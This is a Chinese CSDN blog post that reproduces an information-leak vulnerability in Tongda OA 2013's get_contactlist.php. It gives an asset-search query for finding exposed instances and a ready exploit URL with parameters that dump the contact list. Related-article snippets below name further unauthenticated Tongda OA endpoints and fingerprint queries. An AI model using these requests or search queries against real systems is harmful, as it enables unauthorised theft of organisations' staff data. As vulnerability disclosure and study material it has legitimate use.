【漏洞复现-通达OA】通达OA get_contactlist.php 敏感信息泄漏漏洞

最新推荐文章于 2024-07-29 18:16:17 发布
最新推荐文章于 2024-07-29 18:16:17 发布
阅读量441 收藏
点赞数
分类专栏: 漏洞复现 文章标签: php 开发语言 OA
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_33331244/article/details/136154102
版权
本文介绍了通达OA系统中get_contactlist.php文件存在的信息泄漏漏洞,详细讨论了漏洞简介、影响版本以及如何进行资产测绘,帮助读者理解并复现该漏洞。
摘要由CSDN通过智能技术生成

一、漏洞简介

通达OA get_contactlist.php文件存在信息泄漏漏洞,攻击者通过漏洞可以获取敏感信息,进一步攻击。

二、影响版本

● 通达OA2013

三、资产测绘

● hunterapp.name="通达 OA"
● 特征
在这里插入图片描述四、漏洞复现

/mobile/inc/get_contactlist.php?P=1&KWORD=%25&isuser_info=3

在这里插入图片描述

xiaokp7
关注
专栏目录
订阅专栏
漏洞复现通达OA inc/package/down.php接口存在未授权访问漏洞 附POC
失心少年
11-30 1133
通达OA为各行业不同规模的众多用户提供信息化管理能力,包括流程审批、行政办公、日常事务、数据统计分析、即时通讯、移动办公等,帮助广大用户降低沟通和管理成本,提升生产和决策效率。此外,通达OA通过融合不同的信息化资源,打通信息“孤岛”,精细化流程管理,改善管理模式,实现资源的优化配置和高效运转,全面提升企业竞争力。利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责。漏洞链接:http://127.0.0.1/inc/package/down.php?/cache/org。
通达OA漏洞分析合集
不忘初心,护天下安全!
06-21 4241
通达OA是一套使用比较广泛的办公系统。随着国家护网的开展,通达OA成为渗透人员优先尝试的目标,暴露出了大量漏洞,以下进行介绍。判断通达版本爆破用户、邮箱GET 参数可获取username、email获得计算机名 通达OA v2014 app="TDXK-通达OA" app="TDXK-通达OA" && (title="2013" || title="2015")通达OA v2014 get_contactlist.php文件存在信息泄漏漏洞,攻击者通过漏洞可以获取敏
漏洞概念/漏洞漏洞-零开始白帽子详细教程
最新发布
2401_84915584的博客
07-29 292
由于传播、利用本公众号夜组安全所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,公众号夜组安全及作者不为此承担任何责任,一旦造成后果请自行承担!
漏洞复现通达OA down 未授权员工信息漏洞
qq_34780861的博客
04-26 437
通达OA(Office Anywhere网络智能办公系统)是中国通达公司的一套协同办公自动化软件。通达OA down 未授权员工信息漏洞
数据防密软件在免费通达OA上存在漏洞
weixin_30678349的博客
05-06 192
北京通达信科科技有限公司隶属于中国兵器工业信息中心,简称通达信科,是一支以协同管理软件研发与实施、服务与咨询为主营业务的高科技团队,是国内协同管理软件行业里唯一一家央企单位,中国协同OA软件领跑者。 目前,通达OA已拥有超过数万家的用户,真实用户群体国内第一,中国500强有超过1/3的企业都在使用通达OA通达OA的用户广泛分布于众多行业领域,覆盖全国各省份城市。 伴随着通达OA精灵在各...
通达OA系统11.2漏洞
qq_50854662的博客
12-02 5182
通达OA系统11.2版本为案例的Web渗透
通达oa漏洞复现 
qq_44877321的博客
02-14 1657
漏洞复现
漏洞复现-通达OA通达OA auth_mobi.php在线用户登录漏洞
xiaokp7的博客
08-03 1053
通达OA是由北京通达信科科技有限公司自主研发的协同办公自动化系统,包括流程审批、行政办公、日常事务、数据统计分析、即时通讯、移动办公等。通达OA 中存在某接口查询在线用户,当用户在线时会返回 PHPSESSION使其可登录后台系统。
通达OA v11.5 swfupload_new.php SQL注入漏洞.md
09-07
通达OA漏洞合集
通达OA v2017 action_upload.php 任意文件上传漏洞.md
09-07
通达OA漏洞合集
通达OAv11.7补丁NEW.zip
09-18
1、到官网下载OA最新版服务端安装包、用户PC端办公精灵、手机端下载址:https://cdndown.tongda2000.com/oa/2019/TDOA11.7.exe 2、安装OA服务端到电脑或服务器或云主机。windows的64位系统。 3、安装完,在OA服务管理器(MYOA\BIN\monitor.exe)中关闭所有OA服务,并退出服务控制器monitor.exe。 4、替换补丁中bin和webroot里的文件。直接复制粘贴就可以。 5、到D:\MYOA\BIN目录运行monitor.exe 并启动OA所有服务 6、在OA服务端上打开浏览器,输入http://localhost按提
通达 oa 2010 php 源代码 解密
11-03
通达OA2010版本,完整general目录下php文件无加密,示例: <?php /*********************/ /* */ /* Version : 5.1.0 */ /* Author : RM */ /* Comment : 071223 */ /* */ /*********************/ include_once( "inc/auth.php" ); if ( $LOGIN_THEME != "10" ) { $query = "SELECT * from INTERFACE"; $cursor = exequery( $connection, $query ); if ( $ROW = mysql_fetch_array( $cursor ) ) { $IE_TITLE = $ROW['IE_TITLE']; } echo "<html>\r\n<head>\r\n<title>"; echo $IE_TITLE; echo "</title>\r\n<meta http-equiv=\"Content-Type\" content=\"text/html; charset=gb2312\">\r\n[removed][removed]\r\n[removed]\r\nself.moveTo(0,0);\r\nself.resizeTo(screen.availWidth,screen.availHeight);\r\nself.focus();\r\n\r\nrelogin=0;\r\nfunction exit()\r\n{\r\n if(document.body.clientWidth-event.clientX<50||event.altKey||event.ctrlKey)\r\n {\r\n"; if ( $ISPIRIT == 1 ) { echo "return;"; } echo " var req = new_req();\r\n\treq.open(\"GET\", \"relogin.php\", true);\r\n\treq.send('');\r\n }\r\n}\r\n\r\n[removed]\r\n</head>\r\n"; include_once( "inc/antivirus.txt" ); echo "<frameset rows=\"50,*,20\" cols=\"*\" frameborder=\"no\" border=\"0\" framespacing=\"0\" id=\"frame1\" <frame name=\"banner\" id=\"banner\" scrolling=\"no\" noresize=\"noresize\" src=\"topbar.php\" frameborder=\"0\">\r\n <frameset rows=\"*\" cols=\"200,*\" frameborder=\"no\" border=\"0\" framespacing=\"0\" id=\"frame2\">\r\n <frame name=\"leftmenu\" id=\"leftmenu\" scrolling=\"no\" noresize=\"noresize\" src=\"ipanel\" frameborder=\"0\">\r\n <frame name=\"table_index\" id=\"table_index\" scrolling=\"no\" src=\"table.php\" frameborder=\"0\">\r\n </frameset>\r\n <frame name=\"status_bar\" id=\"status_bar\" scrolling=\"no\" noresize=\"noresize\" src=\"status_bar\" frameborder=\"0\">\r\n</frameset>\r\n</html>\r\n"; exit( ); } include_once( "inc/utility_all.php" ); include_once( "inc/td_core.php" ); include_once( "inc/chinese_date.php" ); include_once( "inc/sys_function_all.php" ); ob_end_clean( ); 本资源(仅供技术学习,版权归原公司所有)
通达OA v2017 video_file.php 任意文件下载漏洞.md
09-07
通达OA漏洞合集
php getlist,getlist.php
weixin_35941667的博客
04-12 466
header("Content-type: text/html; charset=utf-8");require("inc/common.inc.php");$nowdate=date("Y-m-d");$adate=date('Y-m-d',strtotime("$nowdate -7 day"));$id=intval($id);if ($id>0){$fidinfo=$db->g...
通达OA get_datas.php前台sql注入-可获取数据库session登入后台漏洞复现 [附POC]
薛定谔嘚喵博客
11-08 689
攻击者通过对某OA系统进行代码审计,找到get_datas.php文件中执行sql语句的变量处于可控状态。并可以通过此漏洞获取在线用户的Session值。通过构造绕过特殊的sql注入语句,对在线用户Session记录进行任意查询。利用该漏洞可以实现任意用户登录。配合任意文件上传漏洞,上传webshell。
通达OA 漏洞分析
BlusKing
03-19 9626
漏洞通报信息: https://mp.weixin.qq.com/s/_bpg8buT92dzRuGdr2ZrRg https://mp.weixin.qq.com/s/s1yqJNOsCk-uVyCtg6SG7A OA-2017非官网:http://www.downxia.com/downinfo/202980.html 最新版v11下载地址:http://www.tongda20...
通达oa ver.php,通达OA公共代码 php常用检测函数_PHP
weixin_33307540的博客
03-27 647
check_type.php(使用类型检验函数)复制代码 代码如下:复制代码 代码如下:复制代码 代码如下:if ( $CODE_NO == $SELECTED ){$OPTION_STR .= " selected";}$OPTION_STR .= ">".$CODE_NAME."\n";}else if ( $TYPE == "R" ){$OPTION_STR .= "if ( $COD...
鸿宇多用户商城 scan_list.php SQL注入漏洞复现
0xSec
04-04 371
鸿宇多用户商城 scan_list.php文件data['fahuo']参数存在SQL注入漏洞,攻击者除了可以利用SQL注入漏洞获取数据库中的信息(例如,管理员后台密码、站点的用户个人信息)之外,甚至在高权限的情况可向服务器中写入木马,进一步获取服务器系统权限。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

xiaokp7

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值